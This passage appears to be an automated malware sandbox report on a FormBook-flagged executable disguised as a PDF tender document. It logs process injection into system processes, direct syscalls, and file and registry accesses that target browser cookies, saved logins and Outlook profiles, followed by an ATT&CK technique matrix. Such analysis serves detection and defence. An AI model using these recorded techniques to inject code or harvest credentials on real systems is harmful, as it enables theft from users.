Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtDeviceIoControlFile: Direct from: 0x77752AEC
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtCreateUserProcess: Direct from: 0x7775371C
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtWriteVirtualMemory: Direct from: 0x7775490C
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtQueryInformationProcess: Direct from: 0x77752C26
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtResumeThread: Direct from: 0x77752FBC
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtReadVirtualMemory: Direct from: 0x77752E8C
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtCreateKey: Direct from: 0x77752C6C
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtSetInformationThread: Direct from: 0x77752B4C
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtQueryAttributesFile: Direct from: 0x77752E6C
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtAllocateVirtualMemory: Direct from: 0x77753C9C
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtClose: Direct from: 0x77752B6C
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtCreateMutant: Direct from: 0x777535CC
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtWriteVirtualMemory: Direct from: 0x77752E3C
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtMapViewOfSection: Direct from: 0x77752D1C
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtResumeThread: Direct from: 0x777536AC
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtReadFile: Direct from: 0x77752ADC
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtQuerySystemInformation: Direct from: 0x77752DFC
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtDelayExecution: Direct from: 0x77752DDC
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	NtAllocateVirtualMemory: Direct from: 0x77752BFC

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\mfpmp.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: NULL target: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe protection: read write
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: NULL target: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: NULL target: unknown protection: read write
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: NULL target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\mfpmp.exe

Thread register set: target process: 1372

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\mfpmp.exe

Thread APC queued: target process: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 297A008			Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 294D008

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_004587B1 LogonUserW,

0_2_004587B1

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_004048D7

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00464C53 mouse_event,

0_2_00464C53

Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Supply Tender documents PDF.exe"	Jump to behavior
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	Process created: C:\Windows\SysWOW64\mfpmp.exe "C:\Windows\SysWOW64\mfpmp.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe "C:\Users\user\AppData\Local\recomplaint\mouslingly.exe"
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\recomplaint\mouslingly.exe"
Source: C:\Windows\SysWOW64\mfpmp.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00457CAF

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0045874B

Source: Supply Tender documents PDF.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: NSSASn0WvLKV.exe, 00000014.00000000.1283812169.0000000001130000.00000002.00000001.00040000.00000000.sdmp, NSSASn0WvLKV.exe, 00000014.00000002.2430924817.0000000001131000.00000002.00000001.00040000.00000000.sdmp, NSSASn0WvLKV.exe, 00000026.00000002.2437772902.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: XProgram Manager
Source: Supply Tender documents PDF.exe, NSSASn0WvLKV.exe, 00000014.00000000.1283812169.0000000001130000.00000002.00000001.00040000.00000000.sdmp, NSSASn0WvLKV.exe, 00000014.00000002.2430924817.0000000001131000.00000002.00000001.00040000.00000000.sdmp, NSSASn0WvLKV.exe, 00000026.00000002.2437772902.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: NSSASn0WvLKV.exe, 00000014.00000000.1283812169.0000000001130000.00000002.00000001.00040000.00000000.sdmp, NSSASn0WvLKV.exe, 00000014.00000002.2430924817.0000000001131000.00000002.00000001.00040000.00000000.sdmp, NSSASn0WvLKV.exe, 00000026.00000002.2437772902.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: NSSASn0WvLKV.exe, 00000014.00000000.1283812169.0000000001130000.00000002.00000001.00040000.00000000.sdmp, NSSASn0WvLKV.exe, 00000014.00000002.2430924817.0000000001131000.00000002.00000001.00040000.00000000.sdmp, NSSASn0WvLKV.exe, 00000026.00000002.2437772902.0000000000EC1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_0042862B cpuid

0_2_0042862B

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTA3BE.tmp VolumeInformation	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTA3BF.tmp VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Spectrum.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\System32\TieringEngineService.exe

Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00434E87

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00441E06 GetUserNameW,

0_2_00441E06

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00433F3A

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 25.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.2452406678.0000000004CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2402839580.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2439825242.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2437015933.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1400922862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1386107943.0000000006200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1373314710.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1367546163.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2438305108.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\mfpmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\mfpmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\mfpmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\mfpmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\mfpmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\mfpmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\mfpmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\mfpmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\mfpmp.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Source: Supply Tender documents PDF.exe	Binary or memory string: WIN_81
Source: Supply Tender documents PDF.exe	Binary or memory string: WIN_XP
Source: Supply Tender documents PDF.exe	Binary or memory string: WIN_XPe
Source: Supply Tender documents PDF.exe	Binary or memory string: WIN_VISTA
Source: Supply Tender documents PDF.exe	Binary or memory string: WIN_7
Source: Supply Tender documents PDF.exe	Binary or memory string: WIN_8
Source: Supply Tender documents PDF.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 25.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.2452406678.0000000004CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2402839580.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2439825242.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2437015933.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1400922862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1386107943.0000000006200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1373314710.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1367546163.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2438305108.0000000005020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00476283
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00476747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	23 Native API	111 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	12 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 LSASS Driver	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 LSASS Driver	1 Abuse Elevation Control Mechanism	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Valid Accounts	1 DLL Side-Loading	3 Obfuscated Files or Information	NTDS	327 System Information Discovery	Distributed Component Object Model	21 Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	2 Registry Run Keys / Startup Folder	2 Valid Accounts	1 Software Packing	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	21 Access Token Manipulation	1 Timestomp	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	412 Process Injection	1 DLL Side-Loading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	2 Registry Run Keys / Startup Folder	222 Masquerading	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Valid Accounts	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	2 Virtualization/Sandbox Evasion	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	21 Access Token Manipulation	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	412 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Supply Tender documents PDF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
Supply Tender documents PDF.exe